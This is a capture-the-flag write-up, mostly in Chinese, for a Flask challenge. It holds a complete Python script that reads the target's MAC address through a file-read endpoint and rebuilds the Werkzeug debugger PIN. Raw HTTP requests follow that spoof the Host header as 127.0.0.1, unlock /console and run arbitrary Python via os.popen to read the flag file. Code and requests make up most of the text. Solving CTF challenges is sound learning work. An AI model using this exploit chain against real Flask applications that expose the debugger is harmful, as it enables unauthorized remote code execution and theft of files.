My Flask App

Werkzeug 调试器 PIN 计算：通过 /view?filename= 读取目标上的私有信息（MAC 地址等）离线算出 PIN，再把 Host 头改为 127.0.0.1 访问 /console。

exp.py

import hashlib
import requests
from itertools import chain

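# Werkzeug debugger PIN reconstruction, mirroring
# werkzeug.debug.get_pin_and_cookie_name (sha1 + cookiesalt/pinsalt variant,
# Werkzeug >= 2.0; older releases used md5 -- check the target's version).

# "Probably public" bits, in Werkzeug's order: username the app runs as,
# module name, app class name, path of the module that defines the app.
# All four depend on the target environment (Python version, install prefix)
# and must match byte for byte, otherwise the PIN is wrong.
probably_public_bits = [
    'nobody',
    'flask.app',
    'Flask',
    '/usr/local/lib/python3.11/site-packages/flask/app.py',
]

TARGET = "https://my-flask-app-bblym7vig6to.chals.sekai.team:1337"
# sysfs file whose contents are the interface MAC ("aa:bb:cc:dd:ee:ff\n").
MAC_PATH = "/sys/class/net/eth0/address"
# Second private bit, hardcoded from an earlier read of the target.
# NOTE(review): Werkzeug derives this from /etc/machine-id or
# /proc/sys/kernel/random/boot_id (and newer versions append the last path
# component of /proc/self/cgroup); it is per instance, so if the challenge is
# respawned this constant is stale -- re-read it via /view?filename= like the
# MAC rather than trusting it.
MACHINE_ID = 'd012874f-9e09-499b-b531-f5fc6ecffb27'


def mac_to_decimal(raw: str) -> str:
    """Convert a sysfs MAC string (``aa:bb:cc:dd:ee:ff``) to the decimal string Werkzeug hashes.

    Werkzeug feeds ``str(uuid.getnode())`` into the hash, i.e. the MAC as a
    decimal integer, so the colon-separated hex form must be converted.

    Raises:
        ValueError: if *raw* is not exactly 12 hex digits after stripping
            separators -- typically because the file read failed and an HTML
            error page came back instead of a MAC.
    """
    hex_mac = raw.strip().replace(':', '')
    if len(hex_mac) != 12:
        raise ValueError(f"not a MAC address: {raw!r}")
    return str(int(hex_mac, 16))


def fetch_mac(base_url: str, path: str = MAC_PATH, timeout: float = 10.0) -> str:
    """Read the target's MAC through its file-read endpoint and return it in Werkzeug's decimal form.

    Raises:
        requests.HTTPError: non-2xx response. The original script had no status
            check and would silently hash an error page as the MAC.
        ValueError: the response body is not a MAC address.
    """
    res = requests.get(url=base_url + "/view?filename=" + path, timeout=timeout)
    res.raise_for_status()
    return mac_to_decimal(res.text)


def werkzeug_pin(public_bits, private_bits):
    """Return ``(pin, cookie_name)`` exactly as Werkzeug's debugger derives them.

    Every non-empty bit of ``public_bits`` then ``private_bits`` is fed, in
    order, into a single SHA-1. ``cookiesalt`` is appended to derive the cookie
    name, then -- on the *same* hash state -- ``pinsalt`` is appended to derive
    the nine-digit PIN, which is grouped as ``ddd-ddd-ddd``.

    Args:
        public_bits: iterable of str/bytes (falsy entries are skipped).
        private_bits: iterable of str/bytes (falsy entries are skipped).

    Returns:
        tuple ``(pin, cookie_name)``; ``cookie_name`` is ``"__wzd"`` plus the
        first 20 hex digits of the cookie digest.
    """
    h = hashlib.sha1()
    for bit in chain(public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, str):
            bit = bit.encode('utf-8')
        h.update(bit)

    h.update(b'cookiesalt')
    cookie_name = '__wzd' + h.hexdigest()[:20]

    # Werkzeug keeps hashing on the same object, so the PIN digest also covers
    # ``cookiesalt``. Do not start a fresh hash here.
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

    # Werkzeug tries group sizes 5, 4, 3; with nine digits only 3 divides evenly.
    for group_size in (5, 4, 3):
        if len(num) % group_size == 0:
            pin = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                           for x in range(0, len(num), group_size))
            break
    else:
        pin = num
    return pin, cookie_name


def main() -> None:
    """Fetch the MAC from the target, rebuild the PIN and print what the /console requests need."""
    mac = fetch_mac(TARGET)
    print("mac:", mac)

    # Private bits, in Werkzeug's order: MAC as decimal, then the machine id.
    private_bits = [mac, MACHINE_ID]

    pin, cookie_name = werkzeug_pin(probably_public_bits, private_bits)
    print("cookie_name:" + cookie_name)
    print("pin码:" + pin)


if __name__ == "__main__":
    main()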

先访问 /console 页面，从返回的 HTML 里取出 SECRET（即后续请求的 s 参数）。注意：Werkzeug 3.0.3 及以上版本只允许 Host 为回环地址（127.0.0.1 等）的请求访问 /console，所以下面的请求都把 Host 头改成了 127.0.0.1。

GET /console HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://my-flask-app-ddnmc8xe9cys.chals.sekai.team:1337/console
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: close

然后用 cmd=pinauth 提交算出的 PIN 进行验证（s 参数带上前一步取到的 SECRET）；验证成功后响应会下发名为 __wzd… 的调试器 cookie。

GET /console?__debugger__=yes&cmd=pinauth&pin=103-661-276&s=K49SO3GSyRAVoQetGKS2 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://my-flask-app-7deu3qmoe9gv.chals.sekai.team:1337/console
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: close

拿到 __wzd cookie 后，带上它把 cmd 换成任意 Python 代码即可执行命令（下例读取 flag 文件）。

GET /console?__debugger__=yes&cmd=import+os;os.popen('cat+/flag-oS6zdY6caEgZEbNkZTKERMSR0VTnnC4V.txt').read()&frm=0&s=K49SO3GSyRAVoQetGKS2 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://my-flask-app-zinpxug7ji6c.chals.sekai.team:1337/console
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Cookie: __wzd2a7b40dec13bd32ef9ad=1755410731|39fdced07be2
Te: trailers
Connection: close